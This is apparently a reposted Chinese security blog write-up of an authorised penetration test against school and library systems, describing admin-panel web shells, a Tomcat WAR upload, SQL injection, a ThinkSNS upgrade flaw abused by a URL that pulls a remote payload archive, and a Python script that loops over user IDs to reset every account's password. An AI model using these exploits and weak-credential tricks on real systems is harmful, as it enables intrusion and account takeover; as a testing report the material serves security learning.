实战 | 记一次授权的渗透测试

实战 | 记一次授权的渗透测试
2022-10-28 00:1:59 Author: 橘猫学安全(查看原文) 阅读量:52 收藏

1、帝国CMS 后台GETSHELL

图书馆的一个系统，为开源CMS修改的，然后通过版本探测与其他的信息收集，发现那个版本好像有一个getshell，不过是后台的，尝试一下，账号admin密码123456发现对了之后GetShell了

//这个是当时的payload

点击提交后访问

http://xxxxx:port/e/admin/R3inSecurity\_Team.php

然后使用菜刀连接就可以了

不过需要注意的是，这里执行cmd命令会发现其实不是administrator，需要提权，因为当时除了这里其他地方已经获取到了administrator权限，所以这个shell就没有提权

2、某营销系统综合实训室逻辑漏洞

以下是我当时挖到漏洞后写的Poc

1.# __author__ 'R3inS3curity.UzJu'2.# Creat time 2020/7/17 20:14 3.import requests 4.import re 5.from bs4 import BeautifulSoup 6. 7.def Hacked_Testing(): 8.    for a in range(1,100): 9.        r = 'http://xxx:port/updaXte.dXo?methXod=saXve' 10.        cookie1s = {'JSESSIONID':'DCBDA30F80F1DEA2X1123C8080FBE', 11.                   'submenuheader':'-1c'} 12.        datas = { 13.            'id':a, 14.            'password':'123456789', 15.            'repassword':'123456789', 16.            'stuNo':'200107', 17.            'realName':'%E4%B1231%A3', 18.            'sex':'1', 19.            'schollTime': '2019-03-08', 20.            'tel': '%3Cscr23rt123t%3E', 21.            'address': '%3Cscript%3E1alert%281%23script%3E', 22.            'birthPlace': '%3Cscrip123Fscript%3E', 23.            'idNumber': '%3Cscript%3Eale123C%2Fscript%3E', 24.            'head_img': '%2Fuploadfiles1%123lt_head.gif', 25.            'x=': '50', 26.            'y': '6' 27.        } 28.        result = requests.post(url=r, cookies=cookie1s, data=datas) 29.        soup = BeautifulSoup(result.text, features="html.parser") 30.        print('[+]Current ID is：{}，UserName is：{}'.format(a, soup.td.text)) 31.Hacked_Testing()

当时的漏洞截图

这个ID就是用户的ID，修改这个就可以重置任何用户的密码^ ^ 然后写脚本跑

尝试将修改的密码，进行登录，可以登录成功。

3、C-xxxx打印服务系统未授权访问

只要一直点直接打印，打印机就会一直出纸，也可以DIY打印内容，只需要替换框中的内容即可，后来沟通中反馈说打印机除了非常多的纸，部分员工还以为打印机坏了

4、tomcat弱口令GETSHELL

这个漏洞主要就是tomcat-user.xml的配置问题导致的，然后进到manger后上传shell的war包就可以了

这个账号admin 密码为空，然后上传war包就可以getshell了

打包好之后上传就可以啦

5、某卓越营销实践系统SQL注入getshell

这个漏洞没啥好说的，上去sqlmap一把嗦就完事了（其实这里还有一个存储型XSS）

然后远程链接服务器就可以了

这个服务器改端口了，本来是3389远程连接的，改成了3300，接下来就简单说一下，怎么找到3300这个端口的

Cmd输入tasklist /svc然后找到TermService找到PID2416

然后使用netstat -aon|findstr “2416”找到对应的PID就能找到远程端口

6、ThinkSNS管理员弱口令后台GetShell

弱口令登录，后台getshell

漏洞复现地址：

http://xxx:port/index.php?app=admin&mod=Upgrade&act=step1&upurl=http://xxx:port/test/UzJu.zip

由于配置问题，访问/data/upgrade就可以看到目录下的文件，data目录也是如此

将数据包的act改成setp2和upurl改成filename=UzJu.zip

然后去访问这个Php

然后正常获取权限就行，以下是漏洞代码的位置

漏洞代码发生在路径/apps/admin/lib/Action/UpgradeAction.class.php文件。

46行处，升级时调用check函数升级通过C(‘UPURL’).’?v=’.C(‘VERSION’)获取升级链接

在169行，直接再次调用且upurl可控，覆盖之前的&upurl远程升级下载包含.php的UzJu.zip压缩包先下载再校验，存在逻辑问题，直接构造url payload下载。此为漏洞的引发起始点，再往下看在226行处step2，Step2解压也存在问题未进行校验文件就进行解压到网站根目录

7、文件共享信息泄露

全是DB与数据

8、某卓越市场营销模拟平台垂直越权

登录不同的账号，就会有不同的路径，然后尝试改一改路径，发现可以越权，:)

两张图不难发现，我通过修改不同的路径，然后越权到了不同的权限，学生--->老师

内网信息收集，随便放几张图吧，太敏感了

弱口令，永远的神！

转自：HACK学习君来源：https://uzzju.com/?id=55作者：uzZzju

如有侵权，请联系删除

推荐阅读

实战|记一次奇妙的文件上传getshell

「超详细 | 分享」手把手教你如何进行内网渗透

神兵利器 | siusiu-渗透工具管理套件

一款功能全面的XSS扫描器

实战 | 一次利用哥斯拉马绕过宝塔waf

BurpCrypto: 万能网站密码爆破测试工具

快速筛选真实IP并整理为C段 -- 棱眼

自动探测端口顺便爆破工具t14m4t

渗透工具｜无状态子域名爆破工具（1秒扫160万个子域）

查看更多精彩内容，还请关注橘猫学安全：

每日坚持学习与分享，觉得文章对你有帮助可在底部给点个“再看”

文章来源: http://mp.weixin.qq.com/s?__biz=Mzg5OTY2NjUxMw==&mid=2247500060&idx=2&sn=6ebe207874b8ad47ed1130bc19c455ed&chksm=c04d4622f73acf34b0f018375742f5c971e6ad6b72c10ebd0161b28cb7f5795d7276739a75b3#rd
如有侵权请联系:admin#unsafe.sh